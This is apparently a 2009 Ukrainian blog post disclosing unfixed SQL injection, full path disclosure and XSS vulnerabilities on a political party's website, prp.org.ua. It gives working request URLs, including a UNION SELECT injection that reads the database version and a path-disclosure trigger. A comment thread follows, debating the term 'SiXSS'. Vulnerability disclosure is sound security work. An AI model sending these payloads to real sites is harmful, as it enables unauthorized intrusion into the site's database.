« Добірка експлоітів
Переповнення буфера в Google Chrome »

Уразливості на prp.org.ua

19:28 26.06.2009

13.01.2009

У березні, 03.03.2008, я знайшов SQL Injection, Full path disclosure і Cross-Site Scripting уразливості на http://prp.org.ua - сайті політичної партії ПРП. Про що найближчим часом сповіщу адміністрацію сайта.

Зазначу, що ще 3 березня 2008 року я повідомив розробників сайта про наявність дірок на ньому і навів їм приклад XSS. Але ні XSS, ні жодна інша дірка на сайті так досі й не була виправлена. Що дуже несерйозно як для веб сайта політичної сили.

Детальна інформація про уразливості з’явиться пізніше.

26.06.2009

SQL Injection:

http://prp.org.ua/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1

XSS (через SQL Injection):

Full path disclosure:

http://prp.org.ua/index.php?mid=’

http://prp.org.ua/includes/stat.php

XSS:

Дані уразливості досі не виправлені.


This entry was posted on 19:28 26.06.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

4 відповідей на “Уразливості на prp.org.ua”

  1. poma каже:
    П'ятниця, 22:36 26.06.2009

    “XSS (через SQL Injection)”
    така ксс (xss через sqlInj) називається SiXSS

  2. MustLive каже:
    П'ятниця, 23:26 26.06.2009

    poma, спасибі за інформацію :-) .

    Але, по-перше, про таку назву я не чув. По-друге, так я не називаю дані XSS. По-третє, назва не милозвучна (і пишеться і читається не гарно), тому невдала назва ;-) .

    А по-четверте, всі уразливості, які є атакою через інші уразливості, як в даному випадку, я називаю саме за таким шаблоном: уразливість (через уразливість). Щоб було видно яка уразливість є першопричиною для даної атаки.

    Тобто: XSS (через SQL Injection), Redirector (через SQL Injection), HTTP Response Splitting (через SQL Injection), Full path disclosure (через SQL Injection) та багато інших випадків, про які я чимало писав в себе на сайті.

  3. poma каже:
    Субота, 16:21 27.06.2009

    уразливість (через уразливість)
    скорочення назв й придумані для того шоб скорочувати ;)

  4. MustLive каже:
    Неділя, 23:59 16.08.2009

    poma, в тому то і справа, що в секюріті галузі використовують абревіатури, і рідко коли скорочення (а абревіатури і скорочення - це різні речі). А в твоєму випадку це навіть не абревіатура і не скорочення, а казна що :-) .

    SiXSS - це вигадана абревіатура, бо на відміну від таких поширених абревіатур як XSS і SQLi, вона не є абревіатурою (за визначенням). Так що це є нісенітниця :-D . Яка звучить як “сікс”, тобто шість по англійські, і жодним чином не вказує на те, що це XSS через SQL Injection (це більше схоже на те, що хтось помилився коли писав абревіатуру XSS).

    XSS через SQL Injection (XSS over SQL Injection), можна скоротити до XSS через SQLi (XSS over SQLi), або навіть XoS (XoSI). Тоді це буде справжньою абревіатурою (за визначенням). Але без цього можна обійтися і спокійно використовувати повну (чи частково скорочену) назву, щоб не робити абревіатури з інших абревіатур.

Leave a Reply

You must be logged in to post a comment.